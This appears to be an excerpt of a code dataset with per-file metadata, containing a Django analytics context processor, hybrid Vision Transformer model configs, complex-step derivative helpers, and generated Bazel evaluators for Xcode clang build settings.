| 45.835307 | 255 | 0.648411 | 4,747 | 42,581 | 5.631557 | 0.059827 | 0.08641 | 0.089552 | 0.045711 | 0.925111 | 0.917144 | 0.889575 | 0.877829 | 0.865971 | 0.840721 | 0 | 0.001711 | 0.24525 | 42,581 | 928 | 256 | 45.884698 | 0.830108 | 0.340504 | 0 | 0.807377 | 1 | 0 | 0.150189 | 0.028332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.165984 | false | 0.002049 | 0.014344 | 0 | 0.280738 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5bb9b66038f7b90d62f105b583bcd745b8646ab3 | 163 | py | Python | agagd/agagd_core/context_processors/google_analytics.py | annabunches/agagd | 94946b4ec9ebefdb1e4953e7e78f0bb9125adc76 | [
"MIT"
] | null | null | null | agagd/agagd_core/context_processors/google_analytics.py | annabunches/agagd | 94946b4ec9ebefdb1e4953e7e78f0bb9125adc76 | [
"MIT"
] | null | null | null | agagd/agagd_core/context_processors/google_analytics.py | annabunches/agagd | 94946b4ec9ebefdb1e4953e7e78f0bb9125adc76 | [
"MIT"
] | null | null | null | def google_analytics_tracking_id(request):
from django.conf import settings
return {'google_analytics_tracking_id': settings.GOOGLE_ANALYTICS_TRACKING_ID}
| 40.75 | 82 | 0.834356 | 21 | 163 | 6.047619 | 0.571429 | 0.354331 | 0.543307 | 0.590551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104294 | 163 | 3 | 83 | 54.333333 | 0.869863 | 0 | 0 | 0 | 0 | 0 | 0.171779 | 0.171779 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f399b05b91385873d8f3ae56229af973768e7744 | 6,099 | py | Python | tfimm/architectures/vit_hybrid.py | hyenal/tensorflow-image-models | 2012be8ecc7bc23e84dc2488d3e4fe1c80dbfb2c | [
"Apache-2.0"
] | 1 | 2022-01-31T00:48:06.000Z | 2022-01-31T00:48:06.000Z | tfimm/architectures/vit_hybrid.py | hyenal/tensorflow-image-models | 2012be8ecc7bc23e84dc2488d3e4fe1c80dbfb2c | [
"Apache-2.0"
] | null | null | null | tfimm/architectures/vit_hybrid.py | hyenal/tensorflow-image-models | 2012be8ecc7bc23e84dc2488d3e4fe1c80dbfb2c | [
"Apache-2.0"
] | null | null | null | """
Hybrid Vision Transformer (ViT) in TensorFlow
A TensorFlow implementation of the hybrid Vision Transformers described in:
'An Image Is Worth 16 x 16 Words: Transformers for Image Recognition at Scale'
- https://arxiv.org/abs/2010.11929
`How to train your ViT? Data, Augmentation, and Regularization in Vision Transformers`
- https://arxiv.org/abs/2106.10270
These hybrid model definitions depend on code in vision_transformer.py.
They were moved here to keep file sizes sane.
Copyright 2021 Martins Bruveris
Copyright 2021 Ross Wightman
"""
from tfimm.models import register_model
from .vit import ViT, ViTConfig
# The model registry will add each registered entrypoint function to this list.
__all__ = []
@register_model
def vit_tiny_r_s16_p8_224():
"""R+ViT-Ti/S16 w/ 8x8 patch hybrid @ 224 x 224."""
cfg = ViTConfig(
name="vit_tiny_r_s16_p8_224",
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(),
patch_size=8,
embed_dim=192,
nb_blocks=12,
nb_heads=3,
crop_pct=0.9,
first_conv="patch_embed/backbone/conv",
)
return ViT, cfg
@register_model
def vit_tiny_r_s16_p8_384():
"""R+ViT-Ti/S16 w/ 8x8 patch hybrid @ 384 x 384."""
cfg = ViTConfig(
name="vit_tiny_r_s16_p8_384",
input_size=(384, 384),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(),
patch_size=8,
embed_dim=192,
nb_blocks=12,
nb_heads=3,
crop_pct=1.0,
first_conv="patch_embed/backbone/conv",
)
return ViT, cfg

@register_model
def vit_small_r26_s32_224():
"""R26+ViT-S/S32 hybrid."""
cfg = ViTConfig(
name="vit_small_r26_s32_224",
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(2, 2, 2, 2),
patch_size=1,
embed_dim=384,
nb_blocks=12,
nb_heads=6,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg

@register_model
def vit_small_r26_s32_384():
"""R26+ViT-S/S32 hybrid."""
cfg = ViTConfig(
name="vit_small_r26_s32_384",
input_size=(384, 384),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(2, 2, 2, 2),
patch_size=1,
embed_dim=384,
nb_blocks=12,
nb_heads=6,
crop_pct=1.0,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg

@register_model
def vit_base_r50_s16_384():
"""
R50+ViT-B/16 hybrid from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-1k weights fine-tuned from in21k @ 384x384, source
https://github.com/google-research/vision_transformer.
"""
cfg = ViTConfig(
name="vit_base_r50_s16_384",
input_size=(384, 384),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 9),
patch_size=1,
embed_dim=768,
nb_blocks=12,
nb_heads=12,
crop_pct=1.0,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg

@register_model
def vit_large_r50_s32_224():
"""R50+ViT-L/S32 hybrid."""
cfg = ViTConfig(
name="vit_large_r50_s32_224",
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 6, 3),
patch_size=1,
embed_dim=1024,
nb_blocks=24,
nb_heads=16,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg

@register_model
def vit_large_r50_s32_384():
"""R50+ViT-L/S32 hybrid."""
cfg = ViTConfig(
name="vit_large_r50_s32_384",
input_size=(384, 384),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 6, 3),
patch_size=1,
embed_dim=1024,
nb_blocks=24,
nb_heads=16,
crop_pct=1.0,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg

@register_model
def vit_tiny_r_s16_p8_224_in21k():
"""R+ViT-Ti/S16 w/ 8x8 patch hybrid. ImageNet-21k."""
cfg = ViTConfig(
name="vit_tiny_r_s16_p8_224_in21k",
nb_classes=21843,
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(),
patch_size=8,
embed_dim=192,
nb_blocks=12,
nb_heads=3,
crop_pct=0.9,
first_conv="patch_embed/backbone/conv",
)
return ViT, cfg

@register_model
def vit_small_r26_s32_224_in21k():
"""R26+ViT-S/S32 hybrid. ImageNet-21k."""
cfg = ViTConfig(
name="vit_small_r26_s32_224_in21k",
nb_classes=21843,
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(2, 2, 2, 2),
patch_size=1,
embed_dim=384,
nb_blocks=12,
nb_heads=6,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg

@register_model
def vit_base_r50_s16_224_in21k():
"""
R50+ViT-B/16 hybrid model from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source
https://github.com/google-research/vision_transformer.
"""
cfg = ViTConfig(
name="vit_base_r50_s16_224_in21k",
nb_classes=21843,
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 9),
patch_size=1,
embed_dim=768,
nb_blocks=12,
nb_heads=12,
representation_size=768,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg

@register_model
def vit_large_r50_s32_224_in21k():
"""R50+ViT-L/S32 hybrid. ImageNet-21k."""
cfg = ViTConfig(
name="vit_large_r50_s32_224_in21k",
nb_classes=21843,
input_size=(224, 224),
patch_layer="hybrid_embeddings",
patch_nb_blocks=(3, 4, 6, 3),
patch_size=1,
embed_dim=1024,
nb_blocks=24,
nb_heads=16,
crop_pct=0.9,
first_conv="patch_embed/backbone/stem/conv",
)
return ViT, cfg
# recolo/math_tools/complex_step_diff.py
import numpy as np

def dF_complex_x(func, x, y, step=1.e-6):
    """Complex-step approximation of the first derivative w.r.t. x."""
    return np.imag(func(x + 1.j * step, y)) / step


def dF_complex_y(func, x, y, step=1.e-6):
    """Complex-step approximation of the first derivative w.r.t. y."""
    return np.imag(func(x, y + 1.j * step)) / step


def ddF_complex_x(func, x, y, step=1.e-6):
    """Complex-step approximation of the second derivative w.r.t. x."""
    return (2. / step ** 2.) * (func(x, y) - np.real(func(x + 1.j * step, y)))


def ddF_complex_y(func, x, y, step=1.e-6):
    """Complex-step approximation of the second derivative w.r.t. y."""
    return (2. / step ** 2.) * (func(x, y) - np.real(func(x, y + 1.j * step)))


def ddF_complex_xy(func, x, y, step=1.e-6):
    """Complex-step approximation of the mixed second derivative w.r.t. x and y."""
    return (
        (1. / step ** 2.) * (func(x, y) - np.real(func(x + 1.j * step, y + 1.j * step)))
        - 0.5 * ddF_complex_x(func, x, y, step)
        - 0.5 * ddF_complex_y(func, x, y, step)
    )
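A quick sanity check of the complex-step first derivatives, using a hypothetical test function `f(x, y) = x**2 * y + sin(x)` whose derivatives are known in closed form (this demo is illustrative and not part of the recolo module):

```python
import numpy as np

def dF_complex_x(func, x, y, step=1.e-6):
    # First derivative w.r.t. x: the imaginary part of f at a complex
    # argument encodes the derivative with no subtractive cancellation.
    return np.imag(func(x + 1.j * step, y)) / step

def dF_complex_y(func, x, y, step=1.e-6):
    # First derivative w.r.t. y.
    return np.imag(func(x, y + 1.j * step)) / step

# Hypothetical test function with known analytic derivatives.
def f(x, y):
    return x ** 2 * y + np.sin(x)

x, y = 1.3, 0.7
dx = dF_complex_x(f, x, y)  # analytic: 2*x*y + cos(x)
dy = dF_complex_y(f, x, y)  # analytic: x**2
```

Because there is no difference of nearly equal numbers, the first-derivative error stays near machine precision even for very small steps, unlike ordinary finite differences.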
# data/xcspec_evals.bzl
# Extracted from Xcode 11.6
# To update, in rules_ios run `bazel run data_generators:extract_xcspecs`
def _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_CLANG) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_CLANG"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
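Every generated evaluator in this file repeats the same lookup pattern: prefer the user's xcconfig value, otherwise fall back to the option's `DefaultValue` expression (which may itself consult user content, hence the propagated flag). The pattern can be sketched in plain Python (the `resolve` helper and its arguments are illustrative, not part of the generated file):

```python
def resolve(key, xcconfigs, id_configs, evals):
    # Prefer the user's xcconfig value; record that user content was used.
    if key in xcconfigs:
        return (True, xcconfigs[key])
    # Otherwise fall back to the option's DefaultValue evaluator, which
    # returns its own used_user_content flag.
    opt = id_configs.get(key, {})
    if "DefaultValue" in opt:
        return evals[opt["DefaultValue"]](xcconfigs, id_configs)
    return (False, "")

# Example: a setting whose DefaultValue evaluates to the constant YES.
evals = {"default_yes": lambda xc, idc: (False, "YES")}
id_configs = {"USE_LLVM_TARGET_TRIPLES_FOR_CLANG": {"DefaultValue": "default_yes"}}

no_override = resolve("USE_LLVM_TARGET_TRIPLES_FOR_CLANG", {}, id_configs, evals)
with_override = resolve(
    "USE_LLVM_TARGET_TRIPLES_FOR_CLANG",
    {"USE_LLVM_TARGET_TRIPLES_FOR_CLANG": "NO"},
    id_configs,
    evals,
)
```

The generated Starlark inlines this logic per setting because Starlark forbids unbounded recursion, so each default chain is flattened at generation time.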
def _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_ARCHS__DefaultValue(xcconfigs, id_configs):
# $(CURRENT_ARCH)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CURRENT_ARCH"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_TARGET_TRIPLE_VARIANTS__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_CLANG) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_CLANG"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__arch__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_CLANG) != YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_CLANG"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "YES"))
def _com_apple_compilers_llvm_clang_1_0__diagnostic_message_length__DefaultValue(xcconfigs, id_configs):
# 0
return (False, "0")
def _com_apple_compilers_llvm_clang_1_0__print_note_include_stack__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MACRO_BACKTRACE_LIMIT__DefaultValue(xcconfigs, id_configs):
# 0
return (False, "0")
def _com_apple_compilers_llvm_clang_1_0__CLANG_RETAIN_COMMENTS_FROM_SYSTEM_HEADERS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_COLOR_DIAGNOSTICS__DefaultValue(xcconfigs, id_configs):
# $(COLOR_DIAGNOSTICS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "COLOR_DIAGNOSTICS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__GCC_INPUT_FILETYPE__DefaultValue(xcconfigs, id_configs):
# automatic
return (False, "automatic")
def _com_apple_compilers_llvm_clang_1_0__GCC_OPERATION__DefaultValue(xcconfigs, id_configs):
# compile
return (False, "compile")
def _com_apple_compilers_llvm_clang_1_0__GCC_USE_STANDARD_INCLUDE_SEARCHING__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_C_LANGUAGE_STANDARD__DefaultValue(xcconfigs, id_configs):
# compiler-default
return (False, "compiler-default")
def _com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LANGUAGE_STANDARD__DefaultValue(xcconfigs, id_configs):
# compiler-default
return (False, "compiler-default")
def _com_apple_compilers_llvm_clang_1_0__CLANG_CXX_LIBRARY__DefaultValue(xcconfigs, id_configs):
# compiler-default
return (False, "compiler-default")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_ARC__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_OBJC_WEAK__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_LINK_OBJC_RUNTIME__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_DEBUGGING__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__Condition(xcconfigs, id_configs):
# $(GCC_GENERATE_DEBUGGING_SYMBOLS) == YES && ( $(CLANG_ENABLE_MODULES) == YES || ( $(GCC_PREFIX_HEADER) != '' && $(GCC_PRECOMPILE_PREFIX_HEADER) == YES ) )
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_GENERATE_DEBUGGING_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "CLANG_ENABLE_MODULES"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "GCC_PREFIX_HEADER"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "GCC_PRECOMPILE_PREFIX_HEADER"
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
return (used_user_content, (eval_val_0 == "YES" and (eval_val_1 == "YES" or (eval_val_2 != "" and eval_val_3 == "YES"))))
def _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_MODULES__DefaultValue(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULE_DEBUGGING)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULE_DEBUGGING"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_CACHE_PATH__DefaultValue(xcconfigs, id_configs):
# $(MODULE_CACHE_DIR)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "MODULE_CACHE_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULE_LSV__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_AUTOLINK__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_DISABLE_PRIVATE_WARNING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_INTERVAL__DefaultValue(xcconfigs, id_configs):
# 86400
return (False, "86400")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_PRUNE_AFTER__DefaultValue(xcconfigs, id_configs):
# 345600
return (False, "345600")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_IGNORE_MACROS__DefaultValue(xcconfigs, id_configs):
# $(GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_VALIDATE_SYSTEM_HEADERS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_MODULES_BUILD_SESSION_FILE__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_MODULES) == YES && $(DEFINES_MODULE) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_MODULES"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
